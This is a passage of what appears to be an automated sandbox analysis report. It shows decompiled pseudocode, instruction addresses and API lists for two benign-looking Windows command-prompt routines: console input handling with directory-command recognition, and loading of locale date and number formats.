				void* _t182;
				void* _t184;
				void* _t185;
				DWORD* _t187;
				void* _t189;
				struct _COORD _t190;
				signed int _t191;
				signed int _t193;
				void* _t196;
				void* _t197;
				void* _t206;
				void* _t207;

				_t173 = __edx;
				_t193 = (_t191 & 0xfffffff8) - 0x54;
				_t83 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t83 ^ _t193;
				_t187 = _a8;
				_t184 = __edx;
				_v56.dwCursorPosition = __ecx;
				_v80 = _t187;
				_t85 = GetStdHandle(0xfffffff5);
				_v76 = _t85;
				if(_t85 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v76 = _t85;
				}
				if( *0x2e3cc9 == 0) {
					L66:
					__imp__AcquireSRWLockShared(0x2e7f20);
					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
					__imp__ReleaseSRWLockShared(0x2e7f20);
					_t87 = _t86;
				} else {
					_t147 = 0x20;
					_t196 =  *0x2cd0d8 - _t147; // 0x20
					if(_t196 >= 0) {
						goto L66;
					} else {
						_t197 =  *0x2cd0d4 - _t147; // 0x20
						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
							goto L66;
						} else {
							_t149 =  *0x2cd0d8; // 0x20
							_t190 = _v32.dwCursorPosition;
							_t142 = 0;
							_t173 = 1 << _t149;
							asm("bts edx, eax");
							_v68 = _t190;
							_v56.wAttributes = 0x10;
							_v56.dwSize = 0;
							_v44 = 0;
							_v40 = 1;
							_v36 = 0;
							E002CB4DD( *0x2cd0d4 & 0x0000ffff);
							 *0x2cd580 = 0;
							 *0x2cd578 = 0;
							 *0x2cd574 = 0;
							 *0x2cd57c = 0;
							while(1) {
								L7:
								__imp__AcquireSRWLockShared(0x2e7f20);
								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
								_v92 = _t93;
								__imp__ReleaseSRWLockShared(0x2e7f20);
								_v68 =  *_v88;
								if( *0x2cd544 == 0) {
									_t95 = 0;
									__eflags = 0;
								} else {
									EnterCriticalSection( *0x2d3858);
									 *0x2cd544 = 0;
									LeaveCriticalSection( *0x2d3858);
									if(_t142 != 0) {
										RtlFreeHeap(GetProcessHeap(), 0, _t142);
									}
									_t95 = 0;
									_t142 = 0;
								}
								if(_v96 == 0) {
									break;
								}
								_t173 = _t173 | 0xffffffff;
								_v92 = _v92 | 0xffffffff;
								_v80 = _t95;
								if( *_v88 <= 0) {
									break;
								} else {
									while(1) {
										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
										if(_t152 == 0xd) {
											break;
										}
										_t206 = _t152 -  *0x2cd0d8; // 0x20
										if(_t206 == 0) {
											_v92 = _t95;
											goto L25;
										} else {
											_t207 = _t152 -  *0x2cd0d4; // 0x20
											if(_t207 == 0) {
												_v92 = _t95;
												_v80 = 1;
												L24:
												__eflags = _t173 - 0xffffffff;
												if(_t173 != 0xffffffff) {
													goto L18;
												} else {
													L25:
													__eflags = _t95 - 0xffffffff;
													if(_t95 == 0xffffffff) {
														goto L18;
													} else {
														 *_v88 = _t95;
														 *(_t184 + _t95 * 2) = 0;
														__eflags = _t142;
														if(_t142 == 0) {
															L35:
															_v96 = 1;
														} else {
															_t169 = _t142;
															_t133 = _t184;
															while(1) {
																_t181 =  *_t133;
																__eflags = _t181 -  *_t169;
																if(_t181 !=  *_t169) {
																	break;
																}
																__eflags = _t181;
																if(_t181 == 0) {
																	L32:
																	_t170 = 0;
																	_t134 = 0;
																} else {
																	_t182 =  *((intOrPtr*)(_t133 + 2));
																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
																		break;
																	} else {
																		_t133 = _t133 + 4;
																		_t169 = _t169 + 4;
																		__eflags = _t182;
																		if(_t182 != 0) {
																			continue;
																		} else {
																			goto L32;
																		}
																	}
																}
																L34:
																_v96 = _t170;
																__eflags = _t134;
																if(_t134 != 0) {
																	goto L35;
																}
																goto L36;
															}
															asm("sbb eax, eax");
															_t134 = _t133 | 0x00000001;
															_t170 = 0;
															__eflags = 0;
															goto L34;
														}
														L36:
														_t99 = _v80;
														__eflags = _t99;
														if(__eflags == 0) {
															__eflags = _v92 - 2;
															if(__eflags > 0) {
																__imp___wcsnicmp(_t184, L"cd ", 3);
																_t193 = _t193 + 0xc;
																__eflags = _t99;
																if(__eflags == 0) {
																	L45:
																	_t99 = 1;
																} else {
																	__imp___wcsnicmp(_t184, L"rd ", 3);
																	_t193 = _t193 + 0xc;
																	__eflags = _t99;
																	if(__eflags == 0) {
																		goto L45;
																	} else {
																		__imp___wcsnicmp(_t184, L"md ", 3);
																		_t193 = _t193 + 0xc;
																		__eflags = _t99;
																		if(__eflags == 0) {
																			goto L45;
																		} else {
																			__imp___wcsnicmp(_t184, L"chdir ", 6);
																			_t193 = _t193 + 0xc;
																			__eflags = _t99;
																			if(__eflags == 0) {
																				goto L45;
																			} else {
																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
																				_t193 = _t193 + 0xc;
																				__eflags = _t99;
																				if(__eflags == 0) {
																					goto L45;
																				} else {
																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
																					_t193 = _t193 + 0xc;
																					__eflags = _t99;
																					if(__eflags == 0) {
																						goto L45;
																					} else {
																						__imp___wcsnicmp(_t184, L"pushd ", 6);
																						_t193 = _t193 + 0xc;
																						__eflags = _t99;
																						if(__eflags != 0) {
																							_t99 = _v80;
																						} else {
																							goto L45;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														_push(_v96);
														_t155 = _t184;
														_push(_t99);
														_push( !(_v44 >> 4) & 0x00000001);
														_push(_v92);
														_t104 = E002CB2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
														__eflags = _t104;
														if(_t104 == 0) {
															_t105 = E002B7797(_t155);
															__eflags = _t105;
															if(_t105 != 0) {
																 *0x2ec014(0xffffffff);
															}
															_t156 = _t184;
															_t73 = _t156 + 2; // 0xc
															_t177 = _t73;
															do {
																_t106 =  *_t156;
																_t156 = _t156 + 2;
																__eflags = _t106 - _v80;
															} while (_t106 != _v80);
															_t157 = _t156 - _t177;
															__eflags = _t157;
															_v68 = _t157 >> 1;
														} else {
															E002C9897();
															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
															__eflags = _t118;
															if(_t118 != 0) {
																_t168 = _v50 - (_v92 + _v108) / _v56;
																__eflags = _t168;
																_v90 = _t168;
																_t190 = _v92;
															}
															_t163 = _t184;
															_t61 = _t163 + 2; // 0xc
															_t178 = _t61;
															do {
																_t119 =  *_t163;
																_t163 = _t163 + 2;
																__eflags = _t119 - _v80;
															} while (_t119 != _v80);
															_v88 = _t163 - _t178 >> 1;
															SetConsoleCursorPosition(_v100, _t190);
															_push( &_v84);
															_push(_t190);
															_push(_v84);
															_push(0x20);
															_push(_v100);
															FillConsoleOutputCharacterW();
															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
															_v88 = _v108;
															E002B06C0(_t163 - _t178 >> 1);
														}
														__eflags = _t142;
														if(_t142 == 0) {
															_t143 = 0;
															__eflags = 0;
														} else {
															_t143 = 0;
															RtlFreeHeap(GetProcessHeap(), 0, _t142);
														}
														_t159 = _t184;
														_t76 = _t159 + 2; // 0xc
														_t173 = _t76;
														do {
															_t107 =  *_t159;
															_t159 = _t159 + 2;
															__eflags = _t107 - _t143;
														} while (_t107 != _t143);
														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
														_t108 = _t77;
														_v112 = _t108;
														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
														__eflags = _t142;
														if(_t142 == 0) {
															_t87 = 0;
														} else {
															_t173 = _v112;
															E002B1040(_t142, _t173, _t184);
															goto L7;
														}
													}
												}
											} else {
												_t95 = _t95 + 1;
												if(_t95 <  *_v88) {
													continue;
												} else {
													goto L18;
												}
											}
										}
										goto L67;
									}
									_t173 = _t95;
									_t95 = _v92;
									goto L24;
								}
								goto L67;
							}
							L18:
							if(_t142 != 0) {
								RtlFreeHeap(GetProcessHeap(), 0, _t142);
							}
							_t87 = _v96;
						}
					}
				}
				L67:
				_pop(_t185);
				_pop(_t189);
				_pop(_t141);
				return E002B6FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
			}







































































                                              0x002c3506
                                              0x002c350e
                                              0x002c3511
                                              0x002c3518
                                              0x002c351e
                                              0x002c3524
                                              0x002c3526
                                              0x002c352a
                                              0x002c352e
                                              0x002c3534
                                              0x002c353b
                                              0x002c353f
                                              0x002c3546
                                              0x002c3546
                                              0x002c3551
                                              0x002c3932
                                              0x002c3938
                                              0x002c3949
                                              0x002c3952
                                              0x002c3958
                                              0x002c3557
                                              0x002c3559
                                              0x002c355a
                                              0x002c3561
                                              0x00000000
                                              0x002c3567
                                              0x002c3567
                                              0x002c356e
                                              0x00000000
                                              0x002c3588
                                              0x002c3588
                                              0x002c3598
                                              0x002c359c
                                              0x002c359e
                                              0x002c35a0
                                              0x002c35a3
                                              0x002c35a7
                                              0x002c35af
                                              0x002c35b3
                                              0x002c35b7
                                              0x002c35bb
                                              0x002c35bf
                                              0x002c35c4
                                              0x002c35ca
                                              0x002c35d0
                                              0x002c35d6
                                              0x002c35dc
                                              0x002c35dc
                                              0x002c35e1
                                              0x002c35f8
                                              0x002c3603
                                              0x002c3607
                                              0x002c361a
                                              0x002c361e
                                              0x002c365a
                                              0x002c365a
                                              0x002c3620
                                              0x002c3626
                                              0x002c3634
                                              0x002c3639
                                              0x002c3641
                                              0x002c364e
                                              0x002c364e
                                              0x002c3654
                                              0x002c3656
                                              0x002c3656
                                              0x002c3661
                                              0x00000000
                                              0x00000000
                                              0x002c3667
                                              0x002c366a
                                              0x002c366f
                                              0x002c3676
                                              0x00000000
                                              0x002c3678
                                              0x002c3678
                                              0x002c3678
                                              0x002c367f
                                              0x00000000
                                              0x00000000
                                              0x002c3681
                                              0x002c3688
                                              0x002c36c8
                                              0x00000000
                                              0x002c368a
                                              0x002c368a
                                              0x002c3691
                                              0x002c36ba
                                              0x002c36be
                                              0x002c36d4
                                              0x002c36d4
                                              0x002c36d7
                                              0x00000000
                                              0x002c36d9
                                              0x002c36d9
                                              0x002c36d9
                                              0x002c36dc
                                              0x00000000
                                              0x002c36de
                                              0x002c36e2
                                              0x002c36e6
                                              0x002c36ea
                                              0x002c36ec
                                              0x002c3729
                                              0x002c3729
                                              0x002c36ee
                                              0x002c36ee
                                              0x002c36f0
                                              0x002c36f2
                                              0x002c36f2
                                              0x002c36f5
                                              0x002c36f8
                                              0x00000000
                                              0x00000000
                                              0x002c36fa
                                              0x002c36fd
                                              0x002c3714
                                              0x002c3714
                                              0x002c3716
                                              0x002c36ff
                                              0x002c36ff
                                              0x002c3703
                                              0x002c3707
                                              0x00000000
                                              0x002c3709
                                              0x002c3709
                                              0x002c370c
                                              0x002c370f
                                              0x002c3712
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c3712
                                              0x002c3707
                                              0x002c3721
                                              0x002c3721
                                              0x002c3725
                                              0x002c3727
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c3727
                                              0x002c371a
                                              0x002c371c
                                              0x002c371f
                                              0x002c371f
                                              0x00000000
                                              0x002c371f
                                              0x002c3731
                                              0x002c3731
                                              0x002c3735
                                              0x002c3737
                                              0x002c373d
                                              0x002c3742
                                              0x002c3750
                                              0x002c3756
                                              0x002c3759
                                              0x002c375b
                                              0x002c37db
                                              0x002c37dd
                                              0x002c375d
                                              0x002c3765
                                              0x002c376b
                                              0x002c376e
                                              0x002c3770
                                              0x00000000
                                              0x002c3772
                                              0x002c377a
                                              0x002c3780
                                              0x002c3783
                                              0x002c3785
                                              0x00000000
                                              0x002c3787
                                              0x002c378f
                                              0x002c3795
                                              0x002c3798
                                              0x002c379a
                                              0x00000000
                                              0x002c379c
                                              0x002c37a4
                                              0x002c37aa
                                              0x002c37ad
                                              0x002c37af
                                              0x00000000
                                              0x002c37b1
                                              0x002c37b9
                                              0x002c37bf
                                              0x002c37c2
                                              0x002c37c4
                                              0x00000000
                                              0x002c37c6
                                              0x002c37ce
                                              0x002c37d4
                                              0x002c37d7
                                              0x002c37d9
                                              0x002c37e0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c37d9
                                              0x002c37c4
                                              0x002c37af
                                              0x002c379a
                                              0x002c3785
                                              0x002c3770
                                              0x002c375b
                                              0x002c3742
                                              0x002c37e4
                                              0x002c37eb
                                              0x002c37ed
                                              0x002c37fa
                                              0x002c37fb
                                              0x002c37ff
                                              0x002c3804
                                              0x002c3806
                                              0x002c38a7
                                              0x002c38ac
                                              0x002c38ae
                                              0x002c38b2
                                              0x002c38b2
                                              0x002c38b8
                                              0x002c38ba
                                              0x002c38ba
                                              0x002c38bd
                                              0x002c38bd
                                              0x002c38c0
                                              0x002c38c3
                                              0x002c38c3
                                              0x002c38ca
                                              0x002c38ca
                                              0x002c38ce
                                              0x002c380c
                                              0x002c380c
                                              0x002c381a
                                              0x002c3820
                                              0x002c3822
                                              0x002c383b
                                              0x002c383b
                                              0x002c383d
                                              0x002c3842
                                              0x002c3842
                                              0x002c3846
                                              0x002c3848
                                              0x002c3848
                                              0x002c384b
                                              0x002c384b
                                              0x002c384e
                                              0x002c3851
                                              0x002c3851
                                              0x002c3861
                                              0x002c3865
                                              0x002c386f
                                              0x002c3870
                                              0x002c3871
                                              0x002c3875
                                              0x002c3877
                                              0x002c387b
                                              0x002c3892
                                              0x002c389c
                                              0x002c38a0
                                              0x002c38a0
                                              0x002c38d2
                                              0x002c38d4
                                              0x002c38e9
                                              0x002c38e9
                                              0x002c38d6
                                              0x002c38d7
                                              0x002c38e1
                                              0x002c38e1
                                              0x002c38eb
                                              0x002c38ed
                                              0x002c38ed
                                              0x002c38f0
                                              0x002c38f0
                                              0x002c38f3
                                              0x002c38f6
                                              0x002c38f6
                                              0x002c38ff
                                              0x002c38ff
                                              0x002c3902
                                              0x002c3917
                                              0x002c3919
                                              0x002c391b
                                              0x002c392e
                                              0x002c391d
                                              0x002c391d
                                              0x002c3924
                                              0x00000000
                                              0x002c3924
                                              0x002c391b
                                              0x002c36dc
                                              0x002c3693
                                              0x002c3697
                                              0x002c369a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c369a
                                              0x002c3691
                                              0x00000000
                                              0x002c3688
                                              0x002c36ce
                                              0x002c36d0
                                              0x00000000
                                              0x002c36d0
                                              0x00000000
                                              0x002c3676
                                              0x002c369c
                                              0x002c369e
                                              0x002c36ab
                                              0x002c36ab
                                              0x002c36b1
                                              0x002c36b1
                                              0x002c356e
                                              0x002c3561
                                              0x002c395a
                                              0x002c395e
                                              0x002c395f
                                              0x002c3960
                                              0x002c396b

                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 002C352E
                                              • _get_osfhandle.MSVCRT ref: 002C353F
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 002C357A
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002C35E1
                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 002C35F8
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002C3607
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002C3626
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002C3639
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 002C3647
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002C364E
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 002C36A4
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002C36AB
                                              • _wcsnicmp.MSVCRT ref: 002C3750
                                              • _wcsnicmp.MSVCRT ref: 002C3765
                                              • _wcsnicmp.MSVCRT ref: 002C377A
                                              • _wcsnicmp.MSVCRT ref: 002C378F
                                              • _wcsnicmp.MSVCRT ref: 002C37A4
                                              • _wcsnicmp.MSVCRT ref: 002C37B9
                                              • _wcsnicmp.MSVCRT ref: 002C37CE
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 002C381A
                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 002C3865
                                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 002C387B
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 002C3892
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 002C38DA
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002C38E1
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 002C390A
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002C3911
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002C3938
                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 002C3949
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002C3952
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                              • API String ID: 2991647268-3100821235
                                              • Opcode ID: 3b269e1fe74d1e6322eadb1a26c1c8edfad0da4dc77643b57b1f65f366294e0e
                                              • Instruction ID: 75d0a6b3ecd7d0f04d936d6eb74d1f71509ebef4f4ec060402052c08f9665434
                                              • Opcode Fuzzy Hash: 3b269e1fe74d1e6322eadb1a26c1c8edfad0da4dc77643b57b1f65f366294e0e
                                              • Instruction Fuzzy Hash: BBC1A1B1614342AFCB10DF64EC88F6AB7E5FB88314F148A2DF946C62A0D771CA65CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B3F80, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 395COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E002B3F80() {
				signed int _v8;
				short _v264;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr _t86;
				void* _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				void* _t92;
				short* _t93;
				short* _t94;
				short* _t95;
				short* _t96;
				short* _t97;
				short* _t98;
				short* _t99;
				short* _t100;
				short* _t101;
				short* _t102;
				short* _t103;
				intOrPtr* _t106;
				int _t107;
				int _t108;
				int _t109;
				int _t110;
				int _t111;
				int _t112;
				int _t113;
				int _t114;
				int _t115;
				int _t116;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t130;
				void* _t132;
				void* _t134;
				int _t136;
				signed int _t138;

				_t33 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t33 ^ _t138;
				_t136 = E002B41A4();
				if(GetLocaleInfoW(_t136, 0x1e, 0x2cf81c, 8) == 0) {
					_t93 = 0x2cf81c;
					_t107 = 8;
					_t118 = ":" - 0x2cf81c;
					while(1) {
						_t11 = _t107 + 0x7ffffff6; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t91 =  *(_t118 + _t93) & 0x0000ffff;
						if(_t91 == 0) {
							break;
						}
						 *_t93 = _t91;
						_t93 =  &(_t93[1]);
						_t107 = _t107 - 1;
						if(_t107 != 0) {
							continue;
						}
						L33:
						_t93 = _t93 - 2;
						L34:
						 *_t93 = 0;
						goto L1;
					}
					if(_t107 != 0) {
						goto L34;
					}
					goto L33;
				}
				L1:
				if(GetLocaleInfoW(_t136, 0x23,  &_v264, 0x80) == 0) {
					L9:
					 *0x2cd540 = 0;
					if(GetLocaleInfoW(_t136, 0x21,  &_v264, 0x80) != 0) {
						_t86 = (_v264 & 0x0000ffff) - 0x30;
						if(_t86 != 0) {
							_t87 = _t86 - 1;
							if(_t87 == 0) {
								 *0x2cd540 = 1;
								 *0x2cf7f8 = L"dd/MM/yy";
							} else {
								if(_t87 == 1) {
									 *0x2cd540 = 2;
									 *0x2cf7f8 = L"yy/MM/dd";
								}
							}
						} else {
							 *0x2cd540 = _t86;
							 *0x2cf7f8 = L"MM/dd/yy";
						}
					}
					 *0x2cf620 = 2;
					if(GetLocaleInfoW(_t136, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0x2cf620 = 4;
					}
					if(GetLocaleInfoW(_t136, 0x1d, 0x2cf80c, 8) == 0) {
						_t94 = 0x2cf80c;
						_t108 = 8;
						_t120 = "/" - 0x2cf80c;
						while(1) {
							_t13 = _t108 + 0x7ffffff6; // 0x7ffffffe
							if(_t13 == 0) {
								break;
							}
							_t84 =  *(_t120 + _t94) & 0x0000ffff;
							if(_t84 == 0) {
								break;
							}
							 *_t94 = _t84;
							_t94 =  &(_t94[1]);
							_t108 = _t108 - 1;
							if(_t108 != 0) {
								continue;
							}
							L45:
							_t94 = _t94 - 2;
							L46:
							 *_t94 = 0;
							goto L16;
						}
						if(_t108 != 0) {
							goto L46;
						}
						goto L45;
					} else {
						L16:
						if(GetLocaleInfoW(_t136, 0x31, 0x2cf7a8, 0x20) == 0) {
							_t95 = 0x2cf7a8;
							_t109 = 0x20;
							_t122 = L"Mon" - 0x2cf7a8;
							while(1) {
								_t15 = _t109 + 0x7fffffde; // 0x7ffffffe
								if(_t15 == 0) {
									break;
								}
								_t83 =  *(_t122 + _t95) & 0x0000ffff;
								if(_t83 == 0) {
									break;
								}
								 *_t95 = _t83;
								_t95 =  &(_t95[1]);
								_t109 = _t109 - 1;
								if(_t109 != 0) {
									continue;
								}
								L53:
								_t95 = _t95 - 2;
								L54:
								 *_t95 = 0;
								goto L17;
							}
							if(_t109 != 0) {
								goto L54;
							}
							goto L53;
						}
						L17:
						if(GetLocaleInfoW(_t136, 0x32, 0x2cf768, 0x20) == 0) {
							_t96 = 0x2cf768;
							_t110 = 0x20;
							_t124 = L"Tue" - 0x2cf768;
							while(1) {
								_t17 = _t110 + 0x7fffffde; // 0x7ffffffe
								if(_t17 == 0) {
									break;
								}
								_t82 =  *(_t124 + _t96) & 0x0000ffff;
								if(_t82 == 0) {
									break;
								}
								 *_t96 = _t82;
								_t96 =  &(_t96[1]);
								_t110 = _t110 - 1;
								if(_t110 != 0) {
									continue;
								}
								L61:
								_t96 = _t96 - 2;
								L62:
								 *_t96 = 0;
								goto L18;
							}
							if(_t110 != 0) {
								goto L62;
							}
							goto L61;
						}
						L18:
						if(GetLocaleInfoW(_t136, 0x33, 0x2cf728, 0x20) == 0) {
							_t97 = 0x2cf728;
							_t111 = 0x20;
							_t126 = L"Wed" - 0x2cf728;
							while(1) {
								_t19 = _t111 + 0x7fffffde; // 0x7ffffffe
								if(_t19 == 0) {
									break;
								}
								_t81 =  *(_t126 + _t97) & 0x0000ffff;
								if(_t81 == 0) {
									break;
								}
								 *_t97 = _t81;
								_t97 =  &(_t97[1]);
								_t111 = _t111 - 1;
								if(_t111 != 0) {
									continue;
								}
								L69:
								_t97 = _t97 - 2;
								L70:
								 *_t97 = 0;
								goto L19;
							}
							if(_t111 != 0) {
								goto L70;
							}
							goto L69;
						}
						L19:
						if(GetLocaleInfoW(_t136, 0x34, 0x2cf6e8, 0x20) == 0) {
							_t98 = 0x2cf6e8;
							_t112 = 0x20;
							_t128 = L"Thu" - 0x2cf6e8;
							while(1) {
								_t21 = _t112 + 0x7fffffde; // 0x7ffffffe
								if(_t21 == 0) {
									break;
								}
								_t80 =  *(_t128 + _t98) & 0x0000ffff;
								if(_t80 == 0) {
									break;
								}
								 *_t98 = _t80;
								_t98 =  &(_t98[1]);
								_t112 = _t112 - 1;
								if(_t112 != 0) {
									continue;
								}
								L77:
								_t98 = _t98 - 2;
								L78:
								 *_t98 = 0;
								goto L20;
							}
							if(_t112 != 0) {
								goto L78;
							}
							goto L77;
						}
						L20:
						if(GetLocaleInfoW(_t136, 0x35, 0x2cf6a8, 0x20) == 0) {
							_t99 = 0x2cf6a8;
							_t113 = 0x20;
							_t130 = L"Fri" - 0x2cf6a8;
							while(1) {
								_t23 = _t113 + 0x7fffffde; // 0x7ffffffe
								if(_t23 == 0) {
									break;
								}
								_t79 =  *(_t130 + _t99) & 0x0000ffff;
								if(_t79 == 0) {
									break;
								}
								 *_t99 = _t79;
								_t99 =  &(_t99[1]);
								_t113 = _t113 - 1;
								if(_t113 != 0) {
									continue;
								}
								L85:
								_t99 = _t99 - 2;
								L86:
								 *_t99 = 0;
								goto L21;
							}
							if(_t113 != 0) {
								goto L86;
							}
							goto L85;
						}
						L21:
						if(GetLocaleInfoW(_t136, 0x36, 0x2cf668, 0x20) == 0) {
							_t100 = 0x2cf668;
							_t114 = 0x20;
							_t132 = L"Sat" - 0x2cf668;
							while(1) {
								_t25 = _t114 + 0x7fffffde; // 0x7ffffffe
								if(_t25 == 0) {
									break;
								}
								_t78 =  *(_t132 + _t100) & 0x0000ffff;
								if(_t78 == 0) {
									break;
								}
								 *_t100 = _t78;
								_t100 =  &(_t100[1]);
								_t114 = _t114 - 1;
								if(_t114 != 0) {
									continue;
								}
								L93:
								_t100 = _t100 - 2;
								L94:
								 *_t100 = 0;
								goto L22;
							}
							if(_t114 != 0) {
								goto L94;
							}
							goto L93;
						}
						L22:
						if(GetLocaleInfoW(_t136, 0x37, 0x2cf628, 0x20) == 0) {
							_t101 = 0x2cf628;
							_t115 = 0x20;
							_t134 = L"Sun" - 0x2cf628;
							while(1) {
								_t27 = _t115 + 0x7fffffde; // 0x7ffffffe
								if(_t27 == 0) {
									break;
								}
								_t77 =  *(_t134 + _t101) & 0x0000ffff;
								if(_t77 == 0) {
									break;
								}
								 *_t101 = _t77;
								_t101 =  &(_t101[1]);
								_t115 = _t115 - 1;
								if(_t115 != 0) {
									continue;
								}
								L101:
								_t101 = _t101 - 2;
								L102:
								 *_t101 = 0;
								goto L23;
							}
							if(_t115 != 0) {
								goto L102;
							}
							goto L101;
						}
						L23:
						if(GetLocaleInfoW(_t136, 0xe, 0x2cf7fc, 8) == 0) {
							_t102 = 0x2cf7fc;
							_t116 = 8;
							_t134 = "." - 0x2cf7fc;
							while(1) {
								_t29 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t29 == 0) {
									break;
								}
								_t76 =  *(_t134 + _t102) & 0x0000ffff;
								if(_t76 == 0) {
									break;
								}
								 *_t102 = _t76;
								_t102 =  &(_t102[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L109:
								_t102 = _t102 - 2;
								L110:
								 *_t102 = 0;
								goto L24;
							}
							if(_t116 != 0) {
								goto L110;
							}
							goto L109;
						}
						L24:
						if(GetLocaleInfoW(_t136, 0xf, 0x2cf7e8, 8) == 0) {
							_t103 = 0x2cf7e8;
							_t116 = 8;
							_t136 = "," - 0x2cf7e8;
							while(1) {
								_t31 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t31 == 0) {
									break;
								}
								_t75 =  *(_t103 + _t136) & 0x0000ffff;
								if(_t75 == 0) {
									break;
								}
								 *_t103 = _t75;
								_t103 =  &(_t103[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L117:
								_t103 = _t103 - 2;
								L118:
								 *_t103 = 0;
								goto L25;
							}
							if(_t116 != 0) {
								goto L118;
							}
							goto L117;
						}
						L25:
						__imp__setlocale(".OCP");
						return E002B6FD0(0, _t92, _v8 ^ _t138, _t116, _t134, _t136, 0);
					}
				} else {
					_t89 = "1";
					_t106 =  &_v264;
					while(1) {
						_t116 =  *_t106;
						if(_t116 !=  *_t89) {
							break;
						}
						if(_t116 == 0) {
							L7:
							_t90 = 0;
							L8:
							 *0x2cd0cc = _t90;
							goto L9;
						}
						_t116 =  *((intOrPtr*)(_t106 + 2));
						_t5 = _t89 + 2; // 0x410000
						if(_t116 !=  *_t5) {
							break;
						}
						_t106 = _t106 + 4;
						_t89 = _t89 + 4;
						if(_t116 != 0) {
							continue;
						}
						goto L7;
					}
					asm("sbb eax, eax");
					_t90 = _t89 | 0x00000001;
					goto L8;
				}
			}

























































                                              0x002b3f8b
                                              0x002b3f92
                                              0x002b3fa3
                                              0x002b3fb0
                                              0x002be1fa
                                              0x002be204
                                              0x002be209
                                              0x002be20b
                                              0x002be20b
                                              0x002be213
                                              0x00000000
                                              0x00000000
                                              0x002be215
                                              0x002be21c
                                              0x00000000
                                              0x00000000
                                              0x002be21e
                                              0x002be221
                                              0x002be224
                                              0x002be227
